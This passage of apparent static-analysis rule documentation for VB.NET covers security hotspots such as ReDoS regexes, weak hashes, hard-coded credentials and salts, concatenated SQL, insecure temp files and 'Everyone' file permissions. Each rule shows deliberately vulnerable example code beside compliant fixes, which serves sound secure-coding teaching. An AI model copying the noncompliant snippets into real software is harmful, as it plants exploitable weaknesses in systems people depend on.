            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+b", evaluator, options)
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+b", evaluator, options, matchTimeout)
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+b", replacement)
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+b", replacement, options)
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+b", replacement, options, matchTimeout)

            System.Text.RegularExpressions.Regex.Split(input, "(a+)+b")
            System.Text.RegularExpressions.Regex.Split(input, "(a+)+b", options)
            System.Text.RegularExpressions.Regex.Split(input, "(a+)+b", options, matchTimeout)
        End Sub
    End Class
End Namespace

Exceptions

Some corner-case regular expressions will not raise an issue even though they might be vulnerable. For example: (a|aa)+, (a|a?)+.

It is a good idea to test your regular expression if it has the same pattern on both side of a "|".

See

vbnet:S2257

The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Standard algorithms like AES, RSA, SHA, …​ should be used instead.

This rule tracks custom implementation of these types from System.Security.Cryptography namespace:

  • AsymmetricAlgorithm
  • AsymmetricKeyExchangeDeformatter
  • AsymmetricKeyExchangeFormatter
  • AsymmetricSignatureDeformatter
  • AsymmetricSignatureFormatter
  • DeriveBytes
  • HashAlgorithm
  • ICryptoTransform
  • SymmetricAlgorithm

Recommended Secure Coding Practices

  • Use a standard algorithm instead of creating a custom one.

Sensitive Code Example

Public Class CustomHash     ' Noncompliant
    Inherits HashAlgorithm

    Private fResult() As Byte

    Public Overrides Sub Initialize()
        fResult = Nothing
    End Sub

    Protected Overrides Function HashFinal() As Byte()
        Return fResult
    End Function

    Protected Overrides Sub HashCore(array() As Byte, ibStart As Integer, cbSize As Integer)
        fResult = If(fResult, array.Take(8).ToArray)
    End Sub

End Class

Compliant Solution

Dim mySHA256 As SHA256 = SHA256.Create()

See

vbnet:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

Imports System.Security.Cryptography

Sub ComputeHash()

    ' Review all instantiations of classes that inherit from HashAlgorithm, for example:
    Dim hashAlgo As HashAlgorithm = HashAlgorithm.Create() ' Sensitive
    Dim hashAlgo2 As HashAlgorithm = HashAlgorithm.Create("SHA1") ' Sensitive
    Dim sha As SHA1 = New SHA1CryptoServiceProvider() ' Sensitive
    Dim md5 As MD5 = New MD5CryptoServiceProvider() ' Sensitive

    ' ...
End Sub

Class MyHashAlgorithm
    Inherits HashAlgorithm ' Sensitive

    ' ...
End Class

Compliant Solution

Imports System.Security.Cryptography

Sub ComputeHash()
    Dim sha256 = New SHA256CryptoServiceProvider() ' Compliant
    Dim sha384 = New SHA384CryptoServiceProvider() ' Compliant
    Dim sha512 = New SHA512CryptoServiceProvider() ' Compliant

    ' ...
End Sub

See

vbnet:S4792

Configuring loggers is security-sensitive. It has led in the past to the following vulnerabilities:

Logs are useful before, during and after a security incident.

  • Attackers will most of the time start their nefarious work by probing the system for vulnerabilities. Monitoring this activity and stopping it is the first step to prevent an attack from ever happening.
  • In case of a successful attack, logs should contain enough information to understand what damage an attacker may have inflicted.

Logs are also a target for attackers because they might contain sensitive information. Configuring loggers has an impact on the type of information logged and how they are logged.

This rule flags for review code that initiates loggers configuration. The goal is to guide security code reviews.

Ask Yourself Whether

  • unauthorized users might have access to the logs, either because they are stored in an insecure location or because the application gives access to them.
  • the logs contain sensitive information on a production server. This can happen when the logger is in debug mode.
  • the log can grow without limit. This can happen when additional information is written into logs every time a user performs an action and the user can perform the action as many times as he/she wants.
  • the logs do not contain enough information to understand the damage an attacker might have inflicted. The loggers mode (info, warn, error) might filter out important information. They might not print contextual information like the precise time of events or the server hostname.
  • the logs are only stored locally instead of being backuped or replicated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Check that your production deployment doesn’t have its loggers in "debug" mode as it might write sensitive information in logs.
  • Production logs should be stored in a secure location which is only accessible to system administrators.
  • Configure the loggers to display all warnings, info and error messages. Write relevant information such as the precise time of events and the hostname.
  • Choose log format which is easy to parse and process automatically. It is important to process logs rapidly in case of an attack so that the impact is known and limited.
  • Check that the permissions of the log files are correct. If you index the logs in some other service, make sure that the transfer and the service are secure too.
  • Add limits to the size of the logs and make sure that no user can fill the disk with logs. This can happen even when the user does not control the logged information. An attacker could just repeat a logged action many times.

Remember that configuring loggers properly doesn’t make them bullet-proof. Here is a list of recommendations explaining on how to use your logs:

  • Don’t log any sensitive information. This obviously includes passwords and credit card numbers but also any personal information such as user names, locations, etc…​ Usually any information which is protected by law is good candidate for removal.
  • Sanitize all user inputs before writing them in the logs. This includes checking its size, content, encoding, syntax, etc…​ As for any user input, validate using whitelists whenever possible. Enabling users to write what they want in your logs can have many impacts. It could for example use all your storage space or compromise your log indexing service.
  • Log enough information to monitor suspicious activities and evaluate the impact an attacker might have on your systems. Register events such as failed logins, successful logins, server side input validation failures, access denials and any important transaction.
  • Monitor the logs for any suspicious activity.

Sensitive Code Example

.Net Core: configure programmatically

Imports System
Imports System.Collections
Imports System.Collections.Generic
Imports Microsoft.AspNetCore
Imports Microsoft.AspNetCore.Builder
Imports Microsoft.AspNetCore.Hosting
Imports Microsoft.Extensions.Configuration
Imports Microsoft.Extensions.DependencyInjection
Imports Microsoft.Extensions.Logging
Imports Microsoft.Extensions.Options

Namespace MvcApp

    Public Class ProgramLogging

        Public Shared Function CreateWebHostBuilder(args As String()) As IWebHostBuilder

            WebHost.CreateDefaultBuilder(args) _
                .ConfigureLogging(Function(hostingContext, Logging) ' Sensitive
                                      ' ...
                                  End Function) _
            .UseStartup(Of StartupLogging)()

            '...
        End Function
    End Class


    Public Class StartupLogging

        Public Sub ConfigureServices(services As IServiceCollection)

            services.AddLogging(Function(logging) ' Sensitive
                                    '...
                                End Function)
        End Sub

        Public Sub Configure(app As IApplicationBuilder, env As IHostingEnvironment, loggerFactory As ILoggerFactory)

            Dim config As IConfiguration = Nothing
            Dim level As LogLevel = LogLevel.Critical
            Dim includeScopes As Boolean = False
            Dim filter As Func(Of String, Microsoft.Extensions.Logging.LogLevel, Boolean) = Nothing
            Dim consoleSettings As Microsoft.Extensions.Logging.Console.IConsoleLoggerSettings = Nothing
            Dim azureSettings As Microsoft.Extensions.Logging.AzureAppServices.AzureAppServicesDiagnosticsSettings = Nothing
            Dim eventLogSettings As Microsoft.Extensions.Logging.EventLog.EventLogSettings = Nothing

            ' An issue will be raised for each call to an ILoggerFactory extension methods adding loggers.
            loggerFactory.AddAzureWebAppDiagnostics() ' Sensitive
            loggerFactory.AddAzureWebAppDiagnostics(azureSettings) ' Sensitive
            loggerFactory.AddConsole() ' Sensitive
            loggerFactory.AddConsole(level) ' Sensitive
            loggerFactory.AddConsole(level, includeScopes) ' Sensitive
            loggerFactory.AddConsole(filter) ' Sensitive
            loggerFactory.AddConsole(filter, includeScopes) ' Sensitive
            loggerFactory.AddConsole(config) ' Sensitive
            loggerFactory.AddConsole(consoleSettings) ' Sensitive
            loggerFactory.AddDebug() ' Sensitive
            loggerFactory.AddDebug(level) ' Sensitive
            loggerFactory.AddDebug(filter) ' Sensitive
            loggerFactory.AddEventLog() ' Sensitive
            loggerFactory.AddEventLog(eventLogSettings) ' Sensitive
            loggerFactory.AddEventLog(level) ' Sensitive
            ' Only available for NET Standard 2.0 and above
            'loggerFactory.AddEventSourceLogger() ' Sensitive

            Dim providers As IEnumerable(Of ILoggerProvider) = Nothing
            Dim filterOptions1 As LoggerFilterOptions = Nothing
            Dim filterOptions2 As IOptionsMonitor(Of LoggerFilterOptions) = Nothing

            Dim factory As LoggerFactory = New LoggerFactory() ' Sensitive
            factory = New LoggerFactory(providers) ' Sensitive
            factory = New LoggerFactory(providers, filterOptions1) ' Sensitive
            factory = New LoggerFactory(providers, filterOptions2) ' Sensitive
        End Sub
    End Class
End Namespace

Log4Net

Imports System
Imports System.IO
Imports System.Xml
Imports log4net.Appender
Imports log4net.Config
Imports log4net.Repository

Namespace Logging
    Class Log4netLogging
        Private Sub Foo(ByVal repository As ILoggerRepository, ByVal element As XmlElement, ByVal configFile As FileInfo, ByVal configUri As Uri, ByVal configStream As Stream, ByVal appender As IAppender, ParamArray appenders As IAppender())
            log4net.Config.XmlConfigurator.Configure(repository) ' Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, element) ' Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, configFile) ' Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, configUri) ' Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, configStream) ' Sensitive
            log4net.Config.XmlConfigurator.ConfigureAndWatch(repository, configFile) ' Sensitive

            log4net.Config.DOMConfigurator.Configure() ' Sensitive
            log4net.Config.DOMConfigurator.Configure(repository) ' Sensitive
            log4net.Config.DOMConfigurator.Configure(element) ' Sensitive
            log4net.Config.DOMConfigurator.Configure(repository, element) ' Sensitive
            log4net.Config.DOMConfigurator.Configure(configFile) ' Sensitive
            log4net.Config.DOMConfigurator.Configure(repository, configFile) ' Sensitive
            log4net.Config.DOMConfigurator.Configure(configStream) ' Sensitive
            log4net.Config.DOMConfigurator.Configure(repository, configStream) ' Sensitive
            log4net.Config.DOMConfigurator.ConfigureAndWatch(configFile) ' Sensitive
            log4net.Config.DOMConfigurator.ConfigureAndWatch(repository, configFile) ' Sensitive

            log4net.Config.BasicConfigurator.Configure() ' Sensitive
            log4net.Config.BasicConfigurator.Configure(appender) ' Sensitive
            log4net.Config.BasicConfigurator.Configure(appenders) ' Sensitive
            log4net.Config.BasicConfigurator.Configure(repository) ' Sensitive
            log4net.Config.BasicConfigurator.Configure(repository, appender) ' Sensitive
            log4net.Config.BasicConfigurator.Configure(repository, appenders) ' Sensitive
        End Sub
    End Class
End Namespace

NLog: configure programmatically

Namespace Logging
    Class NLogLogging
        Private Sub Foo(ByVal config As NLog.Config.LoggingConfiguration)
            NLog.LogManager.Configuration = config ' Sensitive
        End Sub
    End Class
End Namespace

Serilog

Namespace Logging
    Class SerilogLogging
        Private Sub Foo()
            Dim config As Serilog.LoggerConfiguration = New Serilog.LoggerConfiguration() ' Sensitive
        End Sub
    End Class
End Namespace

See

vbnet:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

Dim username As String = "admin"
Dim password As String = "Password123" ' Sensitive
Dim usernamePassword As String = "user=admin&password=Password123" ' Sensitive
Dim url As String = "scheme://user:Admin123@domain.com" ' Sensitive

Compliant Solution

Dim username As String = "admin"
Dim password As String = GetEncryptedPassword()
Dim usernamePassword As String = String.Format("user={0}&password={1}", GetEncryptedUsername(), GetEncryptedPassword())
Dim url As String = $"scheme://{username}:{password}@domain.com"

Dim url2 As String= "http://guest:guest@domain.com" ' Compliant
Const Password_Property As String = "custom.password" ' Compliant

Exceptions

  • Issue is not raised when URI username and password are the same.
  • Issue is not raised when searched pattern is found in variable name and value.

See

vbnet:S5693

Rejecting requests with significant content length is a good practice to control the network traffic intensity and thus resource consumption in order to prevents DoS attacks.

Ask Yourself Whether

  • size limits are not defined for the different resources of the web application.
  • the web application is not protected by rate limiting features.
  • the web application infrastructure has limited resources.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For most of the features of an application, it is recommended to limit the size of requests to:
    • lower or equal to 8mb for file uploads.
    • lower or equal to 2mb for other requests.

It is recommended to customize the rule with the limit values that correspond to the web application.

Sensitive Code Example

Imports Microsoft.AspNetCore.Mvc

Public Class MyController
    Inherits Controller

    <HttpPost>
    <DisableRequestSizeLimit> ' Sensitive: No size  limit
    <RequestSizeLimit(10000000)> ' Sensitive: 10MB is more than the recommended limit of 8MB
    Public Function PostRequest(Model model) As IActionResult
    ' ...
    End Function

    <HttpPost>
    <RequestFormLimits(MultipartBodyLengthLimit = 8000000)> ' Sensitive: 10MB is more than the recommended limit of 8MB
    Public Function MultipartFormRequest(Model model) As IActionResult
    ' ...
    End Function

End Class

Compliant Solution

Imports Microsoft.AspNetCore.Mvc

Public Class MyController
    Inherits Controller

    <HttpPost>
    <RequestSizeLimit(8000000)> ' Compliant: 8MB
    Public Function PostRequest(Model model) As IActionResult
    ' ...
    End Function

    <HttpPost>
    <RequestFormLimits(MultipartBodyLengthLimit = 8000000)> ' Compliant: 8MB
    Public Function MultipartFormRequest(Model model) AS IActionResult
    ' ...
    End Function

End Class

See

vbnet:S2077

Formatted SQL queries can be difficult to maintain, debug and can increase the risk of SQL injection when concatenating untrusted values into the query. However, this rule doesn’t detect SQL injections (unlike rule S3649), the goal is only to highlight complex/formatted queries.

Ask Yourself Whether

  • Some parts of the query come from untrusted values (like user inputs).
  • The query is repeated/duplicated in other parts of the code.
  • The application must support different types of relational databases.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Sensitive Code Example

Public Sub SqlCommands(ByVal connection As SqlConnection, ByVal query As String, ByVal param As String)
    Dim sensitiveQuery As String = String.Concat(query, param)
    command = New SqlCommand(sensitiveQuery) ' Sensitive

    command.CommandText = sensitiveQuery ' Sensitive

    Dim adapter As SqlDataAdapter
    adapter = New SqlDataAdapter(sensitiveQuery, connection) ' Sensitive
End Sub

Public Sub Foo(ByVal context As DbContext, ByVal query As String, ByVal param As String)
    Dim sensitiveQuery As String = String.Concat(query, param)
    context.Database.ExecuteSqlCommand(sensitiveQuery) ' Sensitive

    context.Query(Of User)().FromSql(sensitiveQuery) ' Sensitive
End Sub

Compliant Solution

Public Sub Foo(ByVal context As DbContext, ByVal value As String)
    context.Database.ExecuteSqlCommand("SELECT * FROM mytable WHERE mycol=@p0", value) ' Compliant, the query is parameterized
End Sub

See

vbnet:S5443

Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like /tmp in Linux based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed, modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.

In the past, it has led to the following vulnerabilities:

This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like /tmp (see examples bellow). It also detects access to environment variables that point to publicly writable directories, e.g., TMP, TMPDIR and TEMP.

  • /tmp
  • /var/tmp
  • /usr/tmp
  • /dev/shm
  • /dev/mqueue
  • /run/lock
  • /var/run/lock
  • /Library/Caches
  • /Users/Shared
  • /private/tmp
  • /private/var/tmp
  • \Windows\Temp
  • \Temp
  • \TMP
  • %USERPROFILE%\AppData\Local\Temp

Ask Yourself Whether

  • Files are read from or written into a publicly writable folder
  • The application creates files with predictable names into a publicly writable folder

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Out of the box, .NET is missing secure-by-design APIs to create temporary files. To overcome this, one of the following options can be used:

  • Use a dedicated sub-folder with tightly controlled permissions
  • Created temporary files in a publicly writable folder and make sure:
    • Generated filename is unpredictable
    • File is readable and writable only by the creating user ID
    • File descriptor is not inherited by child processes
    • File is destroyed as soon as it is closed

Sensitive Code Example

Using Writer As New StreamWriter("/tmp/f") ' Sensitive
' ...
End Using
Dim Tmp As String = Environment.GetEnvironmentVariable("TMP") ' Sensitive

Compliant Solution

Dim RandomPath = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName())

' Creates a new file with write, non inheritable permissions which is deleted on close.
Using FileStream As New FileStream(RandomPath, FileMode.CreateNew, FileAccess.Write, FileShare.None, 4096, FileOptions.DeleteOnClose)
    Using Writer As New StreamWriter(FileStream) ' Sensitive
    ' ...
    End Using
End Using

See

vbnet:S5445

Temporary files are considered insecurely created when the file existence check is performed separately from the actual file creation. Such a situation can occur when creating temporary files using normal file handling functions or when using dedicated temporary file handling functions that are not atomic.

Why is this an issue?

Creating temporary files in a non-atomic way introduces race condition issues in the application’s behavior. Indeed, a third party can create a given file between when the application chooses its name and when it creates it.

In such a situation, the application might use a temporary file that it does not entirely control. In particular, this file’s permissions might be different than expected. This can lead to trust boundary issues.

What is the potential impact?

Attackers with control over a temporary file used by a vulnerable application will be able to modify it in a way that will affect the application’s logic. By changing this file’s Access Control List or other operating system-level properties, they could prevent the file from being deleted or emptied. They may also alter the file’s content before or while the application uses it.

Depending on why and how the affected temporary files are used, the exploitation of a race condition in an application can have various consequences. They can range from sensitive information disclosure to more serious application or hosting infrastructure compromise.

Information disclosure

Because attackers can control the permissions set on temporary files and prevent their removal, they can read what the application stores in them. This might be especially critical if this information is sensitive.

For example, an application might use temporary files to store users' session-related information. In such a case, attackers controlling those files can access session-stored information. This might allow them to take over authenticated users' identities and entitlements.

Attack surface extension

An application might use temporary files to store technical data for further reuse or as a communication channel between multiple components. In that case, it might consider those files part of the trust boundaries and use their content without additional security validation or sanitation. In such a case, an attacker controlling the file content might use it as an attack vector for further compromise.

For example, an application might store serialized data in temporary files for later use. In such a case, attackers controlling those files' content can change it in a way that will lead to an insecure deserialization exploitation. It might allow them to execute arbitrary code on the application hosting server and take it over.

How to fix it

Code examples

The following code example is vulnerable to a race condition attack because it creates a temporary file using an unsafe API function.

Noncompliant code example

Imports System.IO

Sub Example()
    Dim TempPath = Path.GetTempFileName() 'Noncompliant

    Using Writer As New StreamWriter(TempPath)
        Writer.WriteLine("content")
    End Using
End Sub

Compliant solution

Imports System.IO

Sub Example()
    Dim RandomPath = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName())

    Using FileStream As New FileStream(RandomPath, FileMode.CreateNew, FileAccess.Write, FileShare.None, 4096, FileOptions.DeleteOnClose)
        Using Writer As New StreamWriter(FileStream)
            Writer.WriteLine("content")
        End Using
    End Using
End Sub

How does this work?

Applications should create temporary files so that no third party can read or modify their content. It requires that the files' name, location, and permissions are carefully chosen and set. This can be achieved in multiple ways depending on the applications' technology stacks.

Strong security controls

Temporary files can be created using unsafe functions and API as long as strong security controls are applied. Non-temporary file-handling functions and APIs can also be used for that purpose.

In general, applications should ensure that attackers can not create a file before them. This turns into the following requirements when creating the files:

  • Files should be created in a non-public directory.
  • File names should be unique.
  • File names should be unpredictable. They should be generated using a cryptographically secure random generator.
  • File creation should fail if a target file already exists.

Moreover, when possible, it is recommended that applications destroy temporary files after they have finished using them.

Here the example compliant code uses the Path.GetTempPath and Path.GetRandomFileName functions to generate a unique random file name. The file is then open with the FileMode.CreateNew option that will ensure the creation fails if the file already exists. The FileShare.None option will additionally prevent the file from being opened again by any process. To finish, this code ensures the file will get destroyed once the application has finished using it with the FileOptions.DeleteOnClose option.

Resources

Documentation

  • OWASP - Insecure Temporary File

Standards

  • OWASP - Top 10 2021 - A01:2021 - Broken Access Control
  • OWASP - Top 10 2017 - A9:2017 - Using Components with Known Vulnerabilities
  • MITRE - CWE-377: Insecure Temporary File
  • MITRE - CWE-379: Creation of Temporary File in Directory with Incorrect Permissions
vbnet:S2612

In Unix, "others" class refers to all users except the owner of the file and the members of the group assigned to this file.

In Windows, "Everyone" group is similar and includes all members of the Authenticated Users group as well as the built-in Guest account, and several other built-in security accounts.

Granting permissions to these groups can lead to unintended access to files.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

.Net Framework:

Dim unsafeAccessRule = new FileSystemAccessRule("Everyone", FileSystemRights.FullControl, AccessControlType.Allow)

Dim fileSecurity = File.GetAccessControl("path")
fileSecurity.AddAccessRule(unsafeAccessRule) ' Sensitive
fileSecurity.SetAccessRule(unsafeAccessRule) ' Sensitive
File.SetAccessControl("fileName", fileSecurity)

.Net / .Net Core

Dim fileInfo = new FileInfo("path")
Dim fileSecurity = fileInfo.GetAccessControl()

fileSecurity.AddAccessRule(new FileSystemAccessRule("Everyone", FileSystemRights.Write, AccessControlType.Allow)) ' Sensitive
fileInfo.SetAccessControl(fileSecurity)

.Net / .Net Core using Mono.Posix.NETStandard

Dim fileSystemEntry = UnixFileSystemInfo.GetFileSystemEntry("path")
fileSystemEntry.FileAccessPermissions = FileAccessPermissions.OtherReadWriteExecute ' Sensitive

Compliant Solution

.Net Framework

Dim safeAccessRule = new FileSystemAccessRule("Everyone", FileSystemRights.FullControl, AccessControlType.Deny)

Dim fileSecurity = File.GetAccessControl("path")
fileSecurity.AddAccessRule(safeAccessRule)
File.SetAccessControl("path", fileSecurity)

.Net / .Net Core

Dim safeAccessRule = new FileSystemAccessRule("Everyone", FileSystemRights.FullControl, AccessControlType.Deny)

Dim fileInfo = new FileInfo("path")
Dim fileSecurity = fileInfo.GetAccessControl()
fileSecurity.SetAccessRule(safeAccessRule)
fileInfo.SetAccessControl(fileSecurity)

.Net / .Net Core using Mono.Posix.NETStandard

Dim fs = UnixFileSystemInfo.GetFileSystemEntry("path")
fs.FileAccessPermissions = FileAccessPermissions.UserExecute

See

vbnet:S2053

This vulnerability increases the likelihood that attackers are able to compute the cleartext of password hashes.

Why is this an issue?

During the process of password hashing, an additional component, known as a "salt," is often integrated to bolster the overall security. This salt, acting as a defensive measure, primarily wards off certain types of attacks that leverage pre-computed tables to crack passwords.

However, potential risks emerge when the salt is deemed insecure. This can occur when the salt is consistently the same across all users or when it is too short or predictable. In scenarios where users share the same password and salt, their password hashes will inevitably mirror each other. Similarly, a short salt heightens the probability of multiple users unintentionally having identical salts, which can potentially lead to identical password hashes. These identical hashes streamline the process for potential attackers to recover clear-text passwords. Thus, the emphasis on implementing secure, unique, and sufficiently lengthy salts in password-hashing functions is vital.

What is the potential impact?

Despite best efforts, even well-guarded systems might have vulnerabilities that could allow an attacker to gain access to the hashed passwords. This could be due to software vulnerabilities, insider threats, or even successful phishing attempts that give attackers the access they need.

Once the attacker has these hashes, they will likely attempt to crack them using a couple of methods. One is brute force, which entails trying every possible combination until the correct password is found. While this can be time-consuming, having the same salt for all users or a short salt can make the task significantly easier and faster.

If multiple users have the same password and the same salt, their password hashes would be identical. This means that if an attacker successfully cracks one hash, they have effectively cracked all identical ones, granting them access to multiple accounts at once.

A short salt, while less critical than a shared one, still increases the odds of different users having the same salt. This might create clusters of password hashes with identical salt that can then be attacked as explained before.

With short salts, the probability of a collision between two users' passwords and salts couple might be low depending on the salt size. The shorter the salt, the higher the collision probability. In any case, using longer, cryptographically secure salt should be preferred.

How to fix it in .NET

Code examples

The following code contains examples of hard-coded salts.

Noncompliant code example

Imports System.Security.Cryptography

Public Sub Hash(Password As String)
    Dim Salt As Byte() = Encoding.UTF8.GetBytes("salty")
    Dim Hashed As New Rfc2898DeriveBytes(Password, Salt) ' Noncompliant
End Sub

Compliant solution

Imports System.Security.Cryptography

Public Sub Hash(Password As String)
    Dim Hashed As New Rfc2898DeriveBytes(Password, 64)
End Sub

How does this work?

This code ensures that each user’s password has a unique salt value associated with it. It generates a salt randomly and with a length that provides the required security level. It uses a salt length of at least 16 bytes (128 bits), as recommended by industry standards.

In the case of the code sample, the class automatically takes care of generating a secure salt if none is specified.

Resources

Standards

  • OWASP Top 10:2021 A02:2021 - Cryptographic Failures
  • OWASP - Top 10 2017 - A03:2017 - Sensitive Data Exposure
  • CWE - CWE-759: Use of a One-Way Hash without a Salt
  • CWE - CWE-760: Use of a One-Way Hash with a Predictable Salt
vbnet:S1313

Hardcoding IP addresses is security-sensitive. It has led in the past to the following vulnerabilities:

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It misleads to use the same address in every environment (dev, sys, qa, prod).

Last but not least it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks can always be possible, but in the case of a hardcoded IP address solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code, instead make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentially is not required a domain name can be used since it allows to change the destination quickly without having to rebuild the software.

Sensitive Code Example

Dim ip = "192.168.12.42" ' Sensitive
Dim address = IPAddress.Parse(ip)

Compliant Solution

Dim ip = ConfigurationManager.AppSettings("myapplication.ip") ' Compliant
Dim address = IPAddress.Parse(ip)

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

vbnet:S6444

Not specifying a timeout for regular expressions can lead to a Denial-of-Service attack. Pass a timeout when using System.Text.RegularExpressions to process untrusted input because a malicious user might craft a value for which the evaluation lasts excessively long.

Ask Yourself Whether

  • the input passed to the regular expression is untrusted.
  • the regular expression contains patterns vulnerable to catastrophic backtracking.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • It is recommended to specify a matchTimeout when executing a regular expression.
  • Make sure regular expressions are not vulnerable to Denial-of-Service attacks by reviewing the patterns.
  • Consider using a non-backtracking algorithm by specifying RegexOptions.NonBacktracking.

Sensitive Code Example

Public Sub RegexPattern(Input As String)
    Dim EmailPattern As New Regex(".+@.+", RegexOptions.None)
    Dim IsNumber as Boolean = Regex.IsMatch(Input, "[0-9]+")
    Dim IsLetterA as Boolean = Regex.IsMatch(Input, "(a+)+")
End Sub

Compliant Solution

Public Sub RegexPattern(Input As String)
    Dim EmailPattern As New Regex(".+@.+", RegexOptions.None, TimeSpan.FromMilliseconds(100))
    Dim IsNumber as Boolean = Regex.IsMatch(Input, "[0-9]+", RegexOptions.None, TimeSpan.FromMilliseconds(100))
    Dim IsLetterA As Boolean = Regex.IsMatch(Input, "(a+)+", RegexOptions.NonBacktracking) '.Net 7 And above
    AppDomain.CurrentDomain.SetData("REGEX_DEFAULT_MATCH_TIMEOUT", TimeSpan.FromMilliseconds(100)) 'process-wide setting
End Sub

See

vbnet:S4829

This rule is deprecated, and will eventually be removed.

Reading Standard Input is security-sensitive. It has led in the past to the following vulnerabilities:

It is common for attackers to craft inputs enabling them to exploit software vulnerabilities. Thus any data read from the standard input (stdin) can be dangerous and should be validated.

This rule flags code that reads from the standard input.

Ask Yourself Whether

  • data read from the standard input is not sanitized before being used.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize all data read from the standard input before using it.

Sensitive Code Example

Imports System
Public Class C
    Public Sub Main()
        Dim x = Console.[In] ' Sensitive
        Console.Read() ' Sensitive
        Console.ReadKey() ' Sensitive
        Console.ReadLine() ' Sensitive
        Console.OpenStandardInput() ' Sensitive
    End Sub
End Class

Exceptions

This rule does not raise issues when the return value of the Console.Read Console.ReadKey or Console.ReadLine methods is ignored.

Imports System

Public Class C
    Public Sub Main()
        Console.ReadKey() ' Return value is ignored
        Console.ReadLine() ' Return value is ignored
    End Sub
End Class

See

vbnet:S4823

This rule is deprecated, and will eventually be removed.

Using command line arguments is security-sensitive. It has led in the past to the following vulnerabilities:

Command line arguments can be dangerous just like any other user input. They should never be used without being first validated and sanitized.

Remember also that any user can retrieve the list of processes running on a system, which makes the arguments provided to them visible. Thus passing sensitive information via command line arguments should be considered as insecure.

This rule raises an issue when on every program entry points (main methods) when command line arguments are used. The goal is to guide security code reviews.

Ask Yourself Whether

  • any of the command line arguments are used without being sanitized first.
  • your application accepts sensitive information via command line arguments.

If you answered yes to any of these questions you are at risk.

Recommended Secure Coding Practices

Sanitize all command line arguments before using them.

Any user or application can list running processes and see the command line arguments they were started with. There are safer ways of providing sensitive information to an application than exposing them in the command line. It is common to write them on the process' standard input, or give the path to a file containing the information.

Sensitive Code Example

Module Program
    Sub Main(args As String()) ' Sensitive as there is a reference to "args" in the procedure.
        Console.WriteLine(args(0))
    End Sub
End Module

See

vbnet:S4830

This vulnerability makes it possible that an encrypted communication is intercepted.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. The role of certificate validation in this process is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

